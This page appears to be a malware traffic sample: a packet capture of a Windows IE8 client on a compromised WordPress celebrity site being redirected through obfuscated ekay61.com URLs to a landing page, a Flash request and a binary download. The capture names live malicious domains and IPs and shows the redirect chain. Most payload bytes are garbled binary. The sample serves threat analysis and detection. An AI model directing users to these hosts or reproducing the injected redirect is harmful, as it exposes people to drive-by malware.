Unknown Adultfriendfinder Malware Loads Click Fraud Adware PCAP Traffic Sample

By | July 1, 2015

2014-12-31 21:42:01.338041 IP 192.168.138.158.49167 > 91.109.247.12.80: Flags [S], seq 2496731022, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@…[q….[m…..P………. .D……………
2014-12-31 21:42:01.525412 IP 91.109.247.12.80 > 192.168.138.158.49167: Flags [S.], seq 2472158945, ack 2496731023, win 64240, options [mss 1460], length 0
E..,.]……[m…….P…Z&…..`….h……..
2014-12-31 21:42:01.525564 IP 192.168.138.158.49167 > 91.109.247.12.80: Flags [.], ack 1, win 64240, length 0
E..(..@…[|….[m…..P…..Z&.P….%……..
2014-12-31 21:42:01.526288 IP 192.168.138.158.49167 > 91.109.247.12.80: Flags [P.], seq 1:681, ack 1, win 64240, length 680
E…..@…X…..[m…..P…..Z&.P…….GET / HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.google.com/url?url=http://www.celebrityvalley.com/&rct=j&frm=1&q=&esrc=s&sa=U&ei=4aWkVO_eIdLmoAT9lYG4Bw&ved=0CBYQFjAA&usg=AFQjCNHItcI_Gsw9UnJ1WhX3Uu5awZOTuw
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: www.celebrityvalley.com
Connection: Keep-Alive
2014-12-31 21:42:01.526349 IP 91.109.247.12.80 > 192.168.138.158.49167: Flags [.], ack 681, win 64240, length 0
E..(.^……[m…….P…Z&….7P….}……..
2014-12-31 21:42:01.759148 IP 91.109.247.12.80 > 192.168.138.158.49167: Flags [P.], seq 1:1356, ack 681, win 64240, length 1355
E..s._…..e[m…….P…Z&….7P…U…HTTP/1.1 200 OK
Server: nginx admin
Date: Thu, 01 Jan 2015 01:42:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.29
Vary: Accept-Encoding, Cookie
Cache-Control: max-age=3, must-revalidate
WP-Super-Cache: Served supercache file from PHP
Content-Encoding: gzip

3fa4
2014-12-31 21:42:01.989465 IP 192.168.138.158.49167 > 91.109.247.12.80: Flags [P.], seq 681:1072, ack 16671, win 64240, length 391
E…..@…Y…..[m…..P…7.Zh.P…….GET /wp-content/themes/swagger/js/js.css HTTP/1.1
Accept: */*
Referer: http://www.celebrityvalley.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: www.celebrityvalley.com
Connection: Keep-Alive
2014-12-31 21:42:01.989505 IP 91.109.247.12.80 > 192.168.138.158.49167: Flags [.], ack 1072, win 64240, length 0
E..(.m……[m…….P…Zh…..P………….
2014-12-31 21:42:02.221782 IP 91.109.247.12.80 > 192.168.138.158.49167: Flags [P.], seq 16671:18628, ack 1072, win 64240, length 1957
E….o……[m…….P…Zh…..P…….HTTP/1.1 200 OK
Server: nginx admin
Date: Thu, 01 Jan 2015 01:42:01 GMT
Content-Type: text/css
Last-Modified: Tue, 29 Jul 2014 10:29:14 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Cache-Control: max-age=315360000
Content-Encoding: gzip

659
………..Y[o.6.~… 4(…+.q…C….^…….%..E…….x.DITl7….E.;.|..d…..l.M…P(b.2..)…”f.@..hM……..)*..8..x>…z.p..q.T_60y….4….CP1.j6{.w0G.M.h…..g…..J.E..B .h….a.(&.RF.:..$….@.vp.)..Zo..t…..N.Q..W&I.>.7……G..Y..td…H0K.
….-/…Z….g.YY..f….0….k.. .D.._(Vq……….<.l7…F9….)….s..0|.bm.C.B..u..eL…)..&~.6..X….
n .SmC…TL…O..G.-#…8YMr”W&..u..n…B4….(…#h.,..#B.Z>.S!v..W.L….y].T}J…D*.w………..E…\. 2…\7 a[….l}.`….;t=x.J……..qU..%..!…#.V.v….V…….@.K.ec.6..P_…..X.{( k….oI….:.H..R}..H.$8/….h…J(…up…/&4….T$….B’\+…).w….h!.r….J..ts……cU.Yg.zQ…YK.^}Oe.-D=n….22Q..k..^.. p…..G….BY*.0l..bAP…+A….}..$}+………..1….,..>.’.#..’.).[.X’….%..].=…0.{.R..7&..b3.x..B6Y.tN……m….WI.t……s…z..t….s0.,..a.b)=.-…..,…k’.D..(.f…………J….%O%g!b…..QsfzQ’..z….RLE….j.e..x.mJ..viA.9…q…………..Z..S……5.\>G……….Z…..W……&…….&.]..v`pNA..h.?…..Su..5…t……s..a{.k.]U.m….z>D{,………….
i.v..p#g…..i..iH1C.Z…r….f…….c.JY.$J=r<(d…….
.!..9q..v.J9.=.H….uB…2.Z….s. .f_+…dF.Lf&….c..aH…..#5.].\…#..q…….-G7z.Yt..Y..-……B..#..c.u.o!f~%…..R.z…..t7……9jD…..GDF…M…:….v..i…….q…-O…-..BVp….BJ.`a.x..v….iiz……X..~.v………N.,.`.k.Z…;
.3.~…%..\..;..SP….J…H..R>N.wq……..|~…|u.~L.m……….z<.k71F….\..w\.=..?.$b;.4..7….:X..a..=.F$.]e…zu…>6…H..Z..-C..9f…\’3…….)|.O}.TJ=8…………………?.N…………..>…{ …. }.O.W..6;…5…..5…]……P?.hRq.5..?.k.y.
2014-12-31 21:42:02.221970 IP 192.168.138.158.49167 > 91.109.247.12.80: Flags [.], ack 18628, win 64240, length 0
E..(..@…[q….[m…..P…..Zo.P….3……..
2014-12-31 21:42:02.460483 IP 192.168.138.158.49167 > 91.109.247.12.80: Flags [P.], seq 1072:1482, ack 18628, win 64240, length 410
E…..@…Y…..[m…..P…..Zo.P…p…GET /wp-content/themes/swagger/fonts/BebasNeue-webfont.eot? HTTP/1.1
Accept: */*
Referer: http://www.celebrityvalley.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: www.celebrityvalley.com
Connection: Keep-Alive
2014-12-31 21:42:02.721876 IP 91.109.247.12.80 > 192.168.138.158.49167: Flags [P.], seq 18628:19983, ack 1482, win 64240, length 1355
E..s…….5[m…….P…Zo….XP….~..HTTP/1.1 200 OK
Server: nginx admin
Date: Thu, 01 Jan 2015 01:42:01 GMT
Content-Type: application/vnd.ms-fontobject
Content-Length: 15438
Last-Modified: Tue, 29 Jul 2014 10:27:10 GMT
Connection: keep-alive2014-12-31 21:42:02.768058 IP 192.168.138.158.49167 > 91.109.247.12.80: Flags [P.], seq 1482:1891, ack 34326, win 64240, length 409
E…..@…Y…..[m…..P…X.Z..P…T…GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 HTTP/1.1
Accept: */*
Referer: http://www.celebrityvalley.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: www.celebrityvalley.com
Connection: Keep-Alive
2014-12-31 21:42:02.768127 IP 91.109.247.12.80 > 192.168.138.158.49167: Flags [.], ack 1891, win 64240, length 0
E..(…….q[m…….P…Z……P…b………
2014-12-31 21:42:03.034275 IP 91.109.247.12.80 > 192.168.138.158.49167: Flags [P.], seq 34326:35681, ack 1891, win 64240, length 1355
E..s……..[m…….P…Z……P…….HTTP/1.1 200 OK
Server: nginx admin
Date: Thu, 01 Jan 2015 01:42:01 GMT
Content-Type: application/javascript
Content-Length: 7200
Last-Modified: Tue, 21 Oct 2014 11:03:09 GMT
Connection: keep-alive
ETag: “54463d6d-1c20”
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Cache-Control: max-age=315360000
Accept-Ranges: bytes

/*! jQuery Migrate v1.2.1 | (c) 2005, 2013 jQuery Foundation, Inc. and other contributors | jquery.org/license */
jQuery.migrateMute===void 0&&(jQuery.migrateMute=!0),function(e,t,n){function r(n){var r=t.console;i[n]||(i[n]=!0,e.migrateWarnings.push(n),r&&r.warn&&!e.migrateMute&&(r.warn(“JQMIGRATE: “+n),e.migrateTrace&&r.trace&&r.trace()))}function a(t,a,i,o){if(Object.defineProperty)try{return Object.defineProperty(t,a,{configurable:!0,enumerable:!0,get:function(){return r(o),i},set:function(e){r(o),i=e}}),n}catch(s){}e._definePropertyBroken=!0,t[a]=i}var i={};e.migrateWarnings=[],!e.migrateMute&&t.console&&t.console.log&&t.console.log(“JQMIGRATE: Logging is active”),e.migrateTrace===n&&(e.migrateTrace=!0),e.migrateReset=function(){i={},e.migrateWarnings.length=0},”BackCompat”===document.compatMode&&r(“jQuery is not compatible with Quirks Mode”);var o=e(“<input/>”,{size:1}).attr(“size”)&&e.attrFn,s=e.attr,u=e.attrHooks.value&&e.attrHooks.value.get||function(){return null},c=e.attrHooks.value&&e.attrHooks.value.
2014-12-31 21:42:03.034395 IP 91.109.247.12.80 > 192.168.138.158.49167: Flags [P.], seq 35681:37036, ack 1891, win 64240, length 1355
E..s……..[m…….P…Z.B….P…SK..set||function(){return n},l=/^(?:input|button)$/i,d=/^[238]$/,p=/^(?:autofocus|autoplay|async|checked|controls|defer|disabled|hidden|loop|multiple|open|readonly|required|scoped|selected)$/i,f=/^(?:checked|selected)$/i;a(e,”attrFn”,o||{},”jQuery.attrFn is deprecated”),e.attr=function(t,a,i,u){var c=a.toLowerCase(),g=t&&t.nodeType;return u&&(4>s.length&&r(“jQuery.fn.attr( props, pass ) is deprecated”),t&&!d.test(g)&&(o?a in o:e.isFunction(e.fn[a])))?e(t)[a](i):(“type”===a&&i!==n&&l.test(t.nodeName)&&t.parentNode&&r(“Can’t change the ‘type’ of an input or button in IE 6/7/8″),!e.attrHooks[c]&&p.test(c)&&(e.attrHooks[c]={get:function(t,r){var a,i=e.prop(t,r);return i===!0||”boolean”!=typeof i&&(a=t.getAttributeNode(r))&&a.nodeValue!==!1?r.toLowerCase():n},set:function(t,n,r){var a;return n===!1?e.removeAttr(t,r):(a=e.propFix[r]||r,a in t&&(t[a]=!0),t.setAttribute(r,r.toLowerCase())),r}},f.test(c)&&r(“jQuery.fn.attr(‘”+c+”‘) may use property instead of attribute”)),s.call(e,t,a,i))},e.attrHooks.value={get:function(e,t){var n=(e.nodeName||””).toLowerCase();return”button”===n?u.apply(this,arguments):(“input”!==n&&”option”!==n&&r(“jQuery.fn.attr(‘value’) no longer gets properties”),t in e?e.value:null)},set:function(e,t){var a=(e.nodeName||””).toLowerCase();return”button”===a?c.apply(this,arguments):(“input”!==a&&”option”!==a&&r(“jQuery.fn.a
2014-12-31 21:42:03.034461 IP 192.168.138.158.49167 > 91.109.247.12.80: Flags [.], ack 37036, win 64240, length 0
E..(..@…[G….[m…..P…..Z..P…X………
2014-12-31 21:42:03.831142 IP 192.168.138.158.49167 > 91.109.247.12.80: Flags [P.], seq 1891:2297, ack 41852, win 64240, length 406
E…..@…Y…..[m…..P…..Z.]P…N~..GET /wp-content/uploads/2014/12/millions_lg-220×150.jpg HTTP/1.1
Accept: */*
Referer: http://www.celebrityvalley.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: www.celebrityvalley.com
Connection: Keep-Alive
2014-12-31 21:42:03.831212 IP 91.109.247.12.80 > 192.168.138.158.49167: Flags [.], ack 2297, win 64240, length 0
E..(……..[m…….P…Z.].. .P…C………
2014-12-31 21:42:04.017648 IP 91.109.247.12.80 > 192.168.138.158.49167: Flags [P.], seq 41852:43207, ack 2297, win 64240, length 1355
E..s.(……[m…….P…Z.].. .P….b..HTTP/1.1 200 OK
Server: nginx admin
Date: Thu, 01 Jan 2015 01:42:02 GMT
Content-Type: image/jpeg
Last-Modified: Wed, 24 Dec 2014 22:35:46 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Cache-Control: max-age=315360000
Content-Encoding: gzip

1ea0
ETag: “53d776fe-3c4e”
Accept-Ranges: bytes
2014-12-31 21:42:04.025840 IP 192.168.138.158.49167 > 91.109.247.12.80: Flags [P.], seq 2297:2710, ack 50027, win 62840, length 413
E…..@…Yd….[m…..P.. ..Z.LP..x.%..GET /wp-content/uploads/2014/11/22549__img_0253_01-540×390.jpg HTTP/1.1
Accept: */*
Referer: http://www.celebrityvalley.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: www.celebrityvalley.com
Connection: Keep-Alive
2014-12-31 21:42:04.025901 IP 91.109.247.12.80 > 192.168.138.158.49167: Flags [.], ack 2710, win 64240, length 0
E..(.>……[m…….P…Z.L..”$P…”&……..
2014-12-31 21:42:04.220004 IP 91.109.247.12.80 > 192.168.138.158.49167: Flags [P.], seq 50027:51382, ack 2710, win 64240, length 1355
E..s.v…..N[m…….P…Z.L..”$P…….HTTP/1.1 200 OK
Server: nginx admin
Date: Thu, 01 Jan 2015 01:42:03 GMT
Content-Type: image/jpeg
Last-Modified: Fri, 28 Nov 2014 17:41:56 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Cache-Control: max-age=315360000
Content-Encoding: gzip

c00a
…………@{..PNG
2014-12-31 21:42:05.333363 IP 192.168.138.158.49167 > 91.109.247.12.80: Flags [.], ack 251547, win 64240, length 0
E..(.{@…Y…..[m…..P..”$.].|P………….
2014-12-31 21:42:05.334998 IP 192.168.138.158.49167 > 91.109.247.12.80: Flags [P.], seq 2710:3125, ack 251547, win 64240, length 415
E….~@…W…..[m…..P..”$.].|P…(…GET /wp-content/uploads/2014/12/holmes-elle-122414sp-300×170.jpg HTTP/1.1
Accept: */*
Referer: http://www.celebrityvalley.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: www.celebrityvalley.com
Connection: Keep-Alive
2014-12-31 21:42:05.335049 IP 91.109.247.12.80 > 192.168.138.158.49167: Flags [.], ack 3125, win 64240, length 0
E..(……..[m…….P…].|..#.P….T……..
2014-12-31 21:42:05.535758 IP 91.109.247.12.80 > 192.168.138.158.49167: Flags [P.], seq 251547:252902, ack 3125, win 64240, length 1355
E..s.L…..w[m…….P…].|..#.P….;..HTTP/1.1 200 OK
Server: nginx admin
Date: Thu, 01 Jan 2015 01:42:04 GMT
Content-Type: image/jpeg
Last-Modified: Thu, 25 Dec 2014 02:23:40 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Cache-Control: max-age=315360000
Content-Encoding: gzip

56fa
2014-12-31 21:42:06.868980 IP 192.168.138.158.49167 > 91.109.247.12.80: Flags [P.], seq 5623:6018, ack 334563, win 64240, length 395
E…..@…V…..[m…..P..-.._A.P…….GET /wp-content/themes/swagger/js/plugins.js HTTP/1.1
Accept: */*
Referer: http://www.celebrityvalley.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: www.celebrityvalley.com
Connection: Keep-Alive
2014-12-31 21:42:06.869068 IP 91.109.247.12.80 > 192.168.138.158.49167: Flags [.], ack 6018, win 64240, length 0
E..(……..[m…….P…_A…/.P………….
2014-12-31 21:42:07.067297 IP 91.109.247.12.80 > 192.168.138.158.49167: Flags [FP.], seq 334563:335140, ack 6018, win 64240, length 577
E..i.0……[m…….P…_A…/.P…U…HTTP/1.1 302 Moved Temporarily
Server: nginx admin
Date: Thu, 01 Jan 2015 01:42:05 GMT
Content-Type: text/html
Content-Length: 154
Connection: close
Location: http://pn24tmg6bxdzvpxgypgvxwt.ekay61.com/index.php?b=anM9MSZ1eGJtY3BrZT15amkmdGltZT0xNTAxMDEwMTM3MjMzMjAzNDk1MCZzcmM9Mjc1JnN1cmw9d3d3LmNlbGVicml0eXZhbGxleS5jb20mc3BvcnQ9ODAma2V5PTI3NjVDQ0Q1JnN1cmk9L3dwLWNvbnRlbnQvdGhlbWVzL3N3YWdnZXIvanMvcGx1Z2lucy5qcw==

<html>
<head><title>302 Found</title></head>
<body bgcolor=”white”>
<center><h1>302 Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
2014-12-31 21:42:07.345597 IP 192.168.138.158.49210 > 67.215.2.195.80: Flags [P.], seq 1:580, ack 1, win 64240, length 579
E..k..@…a…..C….:.Pvv!.+.*.P….1..GET /index.php?b=anM9MSZ1eGJtY3BrZT15amkmdGltZT0xNTAxMDEwMTM3MjMzMjAzNDk1MCZzcmM9Mjc1JnN1cmw9d3d3LmNlbGVicml0eXZhbGxleS5jb20mc3BvcnQ9ODAma2V5PTI3NjVDQ0Q1JnN1cmk9L3dwLWNvbnRlbnQvdGhlbWVzL3N3YWdnZXIvanMvcGx1Z2lucy5qcw== HTTP/1.1
Accept: */*
Referer: http://www.celebrityvalley.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: pn24tmg6bxdzvpxgypgvxwt.ekay61.com
2014-12-31 21:42:07.345680 IP 67.215.2.195.80 > 192.168.138.158.49210: Flags [.], ack 580, win 64240, length 0
E..(.Y……C……..P.:+.*.vv#.P…r………
2014-12-31 21:42:08.014697 IP 67.215.2.195.80 > 192.168.138.158.49210: Flags [P.], seq 1:814, ack 580, win 64240, length 813
E..U…… .C……..P.:+.*.vv#.P….0..HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Thu, 01 Jan 2015 01:42:07 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-store, no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:01 +0000
Content-Encoding: gzip
Vary: Accept-Encoding

1fa
…………]o.0…….z1.ACp..)P.@…Y.N.M2.C…LB:……nb..|..=.9.}U…..4……….L!..T…………16.=M…b..l.v\.m. .Fq..~.}…..G…U….Tkt..[…..k..’.’..9.r..|.r.r.R..
K..”…..’.9.7<…&.W.”….P…z..RD.M…>….JA..g…….gB\….._$…z.`}3D`….D……@=..e.|..45.c. S8…r…)%u……G……F.h..X%..%….#…L..^8……..D….&…,. P…..I…x………..p”……K.. .Ws..”CW6f..x6..GG3…..C+4..?..nd..h……Q…j……|..B^!wg’O.3..k..’.,.I.g ……(u0…[..X.”….Z-Q……….X.o-…
0
2014-12-31 21:42:08.116201 IP 67.215.2.195.80 > 192.168.138.158.49210: Flags [P.], seq 1:814, ack 580, win 64240, length 813
E..U……..C……..P.:+.*.vv#.P….0..HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Thu, 01 Jan 2015 01:42:07 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-store, no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:01 +0000
Content-Encoding: gzip
Vary: Accept-Encoding

1fa
2014-12-31 21:42:08.117426 IP 192.168.138.158.49210 > 67.215.2.195.80: Flags [.], ack 814, win 63427, length 0
E..(.8@…c…..C….:.Pvv#.+.-5P…r………
2014-12-31 21:42:08.520731 IP 192.168.138.158.52285 > 8.8.8.8.53: 25783+ A? pn24tmg6bxdzvpxgypgvxwt1275597798de83cb36ba750ef5e7e09f9.ekay61.com. (85)
E..q.^……………=.5.]..d………..8pn24tmg6bxdzvpxgypgvxwt1275597798de83cb36ba750ef5e7e09f9.ekay61.com…..
2014-12-31 21:42:08.855057 IP 8.8.8.8.53 > 192.168.138.158.52285: 25783 1/0/0 A 67.215.2.195 (101)
E….)….A……….5.=.m<.d………..8pn24tmg6bxdzvpxgypgvxwt1275597798de83cb36ba750ef5e7e09f9.ekay61.com………….8?..C…
2014-12-31 21:42:08.856664 IP 192.168.138.158.49220 > 67.215.2.195.80: Flags [S], seq 1115835524, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4.j@…cy….C….D.PB.L……. .m……………
2014-12-31 21:42:09.067451 IP 67.215.2.195.80 > 192.168.138.158.49220: Flags [S.], seq 4036785705, ack 1115835525, win 64240, options [mss 1460], length 0
E..,.6……C……..P.D..v)B.L.`…T………
2014-12-31 21:42:09.094653 IP 192.168.138.158.49220 > 67.215.2.195.80: Flags [.], ack 1, win 64240, length 0
E..(.q@…c~….C….D.PB.L…v*P…l………
2014-12-31 21:42:09.096294 IP 192.168.138.158.49220 > 67.215.2.195.80: Flags [P.], seq 1:559, ack 1, win 64240, length 558
E..V.r@…aO….C….D.PB.L…v*P….8..GET /get_gift.php HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: pn24tmg6bxdzvpxgypgvxwt1275597798de83cb36ba750ef5e7e09f9.ekay61.com
Connection: Keep-Alive
2014-12-31 21:42:09.096432 IP 67.215.2.195.80 > 192.168.138.158.49220: Flags [.], ack 559, win 64240, length 0
E..(.7……C……..P.D..v*B.N.P…jq……..
2014-12-31 21:42:09.428771 IP 67.215.2.195.80 > 192.168.138.158.49220: Flags [P.], seq 1:1200, ack 559, win 64240, length 1199
E….N……C……..P.D..v*B.N.P….K..HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Thu, 01 Jan 2015 01:42:09 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-store, no-cache, must-revalidate
Expires: Thu, 01 Jan 2015 01:42:09 +0000
Content-Encoding: gzip
Vary: Accept-Encoding

37c

2014-12-31 21:42:09.473087 IP 192.168.138.158.49220 > 67.215.2.195.80: Flags [P.], seq 559:904, ack 1200, win 63041, length 345
E…..@…b…..C….D.PB.N…z.P..A.I..GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: pn24tmg6bxdzvpxgypgvxwt1275597798de83cb36ba750ef5e7e09f9.ekay61.com
Connection: Keep-Alive
2014-12-31 21:42:09.473181 IP 67.215.2.195.80 > 192.168.138.158.49220: Flags [.], ack 904, win 64240, length 0
E..(.P……C……..P.D..z.B.P.P…di……..
2014-12-31 21:42:09.897184 IP 67.215.2.195.80 > 192.168.138.158.49220: Flags [P.], seq 1200:1448, ack 904, win 64240, length 248
E.. .^….
.C……..P.D..z.B.P.P…q…HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Thu, 01 Jan 2015 01:42:09 GMT
Content-Type: text/html
Content-Length: 20
Connection: keep-alive
X-Powered-By: PHP/5.4.35-0+deb7u2
Vary: Accept-Encoding
Content-Encoding: gzip

………………..
2014-12-31 21:42:10.001528 IP 67.215.2.195.80 > 192.168.138.158.49220: Flags [P.], seq 1200:1448, ack 904, win 64240, length 248
E.. .b….
.C……..P.D..z.B.P.P…q…HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Thu, 01 Jan 2015 01:42:09 GMT
Content-Type: text/html
Content-Length: 20
Connection: keep-alive
X-Powered-By: PHP/5.4.35-0+deb7u2
Vary: Accept-Encoding
Content-Encoding: gzip

………………..
2014-12-31 21:42:10.001548 IP 192.168.138.158.49220 > 67.215.2.195.80: Flags [.], ack 1448, win 62793, length 0
E..(..@…cn….C….D.PB.P…{.P..Ii………
2014-12-31 21:42:10.393964 IP 192.168.138.158.49222 > 67.215.2.195.80: Flags [S], seq 2079154230, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@…c_….C….F.P{.`6…… . {…………..
2014-12-31 21:42:10.504995 IP 67.215.2.195.80 > 192.168.138.158.49222: Flags [S.], seq 1886175059, ack 2079154231, win 64240, options [mss 1460], length 0
E..,.t…..wC……..P.Fpl.S{.`7`…>………
2014-12-31 21:42:10.505149 IP 192.168.138.158.49222 > 67.215.2.195.80: Flags [.], ack 1, win 64240, length 0
E..(..@…cj….C….F.P{.`7pl.TP…V………
2014-12-31 21:42:10.505337 IP 192.168.138.158.49222 > 67.215.2.195.80: Flags [P.], seq 1:628, ack 1, win 64240, length 627
E…..@…`…..C….F.P{.`7pl.TP…….GET /V0ZWUUgDT0Y.html HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://pn24tmg6bxdzvpxgypgvxwt1275597798de83cb36ba750ef5e7e09f9.ekay61.com/get_gift.php
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: jkarbqs789vhnmqzn919nhm.ekay61.com
Connection: Keep-Alive
2014-12-31 21:42:10.505435 IP 67.215.2.195.80 > 192.168.138.158.49222: Flags [.], ack 628, win 64240, length 0
E..(.u…..zC……..P.Fpl.T{.b.P…T………
2014-12-31 21:42:10.997894 IP 67.215.2.195.80 > 192.168.138.158.49222: Flags [P.], seq 1:1356, ack 628, win 64240, length 1355
E..s……..C……..P.Fpl.T{.b.P…….HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Thu, 01 Jan 2015 01:42:10 GMT
Content-Type: text/html
Content-Length: 11958
Connection: keep-alive
X-Powered-By: PHP/5.4.35-0+deb7u2
Vary: Accept-Encoding
Content-Encoding: gzip
2014-12-31 21:42:11.444064 IP 192.168.138.158.49222 > 67.215.2.195.80: Flags [P.], seq 628:1109, ack 12190, win 64240, length 481
E.. ..@…a…..C….F.P{.b.pl..P…{…GET /AwoVGwUGAEEOVxlXDlRTBgIDQERTV1YOVFcDHAJBRUhdVlxXVA1OVRtA HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://jkarbqs789vhnmqzn919nhm.ekay61.com/V0ZWUUgDT0Y.html
x-flash-version: 11,2,202,228
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: jkarbqs789vhnmqzn919nhm.ekay61.com
Connection: Keep-Alive
2014-12-31 21:42:11.444148 IP 67.215.2.195.80 > 192.168.138.158.49222: Flags [.], ack 1109, win 64240, length 0
E..(…….SC……..P.Fpl..{.d.P…”………
2014-12-31 21:42:11.850562 IP 67.215.2.195.80 > 192.168.138.158.49222: Flags [P.], seq 12190:13642, ack 1109, win 64240, length 1452
E………..C……..P.Fpl..{.d.P….b..HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Thu, 01 Jan 2015 01:42:11 GMT
Content-Type: application/octet-stream
Content-Length: 23574
Connection: keep-alive
X-Powered-By: PHP/5.4.35-0+deb7u2
Accept-Ranges: bytes
Content-Disposition: inline; filename=1436
2014-12-31 21:42:12.279040 IP 192.168.138.158.49223 > 67.215.2.195.80: Flags [P.], seq 1:368, ack 1, win 64240, length 367
E…..@…a…..C….G.P…….;P…^P..GET /ABsJAkgDB0REGlQaQxlWAAADR0VQUFRCGVYEBR1GRFFLXkJLVQcLT0IOFA0PIgY1QQ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: jkarbqs789vhnmqzn919nhm.ekay61.com
Connection: Keep-Alive
